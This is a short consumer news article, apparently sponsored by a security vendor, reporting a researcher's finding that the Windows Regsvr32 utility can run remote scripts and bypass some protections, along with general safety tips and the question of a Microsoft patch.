Leave a comment

Security Alert: Core Windows feature gives hackers a way into your computer

Presented by Kaspersky Lab
The power of protection. Stay safe online with award-winning software. Click here to save 50%.
Security Alert: Core Windows feature gives hackers a way into your computer
Eric Broder Van Dyke / Shutterstock.com

There's no such thing as perfect security. A clever person or group can always find a way through or around obstacles to reach a goal. We're learning that again thanks to a security researcher who found a potentially dangerous feature buried deep in Windows.

This feature could let a hacker install malicious programs without administrator privileges or much chance of being stopped. It isn't clear when, if, or how Microsoft can patch this problem, and here's why.

The source of the problem is a core Windows program called Regsvr32, or Windows Registry Server, which is what what links up DLL, or library files, with the Windows Registry. It's a critical part of Windows, but it has a hidden feature no one realized.

What the security researcher found is that it Regsvr32 can be used to run Javascript or VBscript that lives on a remote server. With a single command, a hacker can start a major attack against your computer.

Even worse, because of the way Regsvr32 works, it bypasses a lot of Windows' built-in security. In this case, this attack even bypasses Regsvr32's normal security against running things that can change the computer.

There is some good news, however. According the security researcher, this works only if a hacker has physical access to the computer. It's also only the first stage of an attack that requires the smarts of a skilled hacker to do actual damage.

While this is going to be a big concern for big companies with lots of computers and employees, individual users aren't in much danger. It's always possible a hacker will figure out a way to take advantage of this remotely, but they would still need to trick you into downloading and running a program first.

As always, a good way to stay safe from most online threats is to avoid links and attachment in unsolicited or suspicious email. You should also change your account settings from administrator to standard, which keeps programs from installing without your permission.

Will Microsoft update Regsvr32 to minimize this risk? It depends on whether it thinks the risk of this type of attack outweighs changing a vital part of Windows and potentially breaking a lot of computers.

In either case, keep reading our Happening Now section for updates on this and other security risks. We'll also tell you when Microsoft releases new patches and how you can get them.

Next Story
Source: Threat Post
Google goes purple in memory of music legend Prince
Previous Happening Now

Google goes purple in memory of music legend Prince

Malware alert: Trojan spreading through popular word processing programs
Next Happening Now

Malware alert: Trojan spreading through popular word processing programs

View Comments ()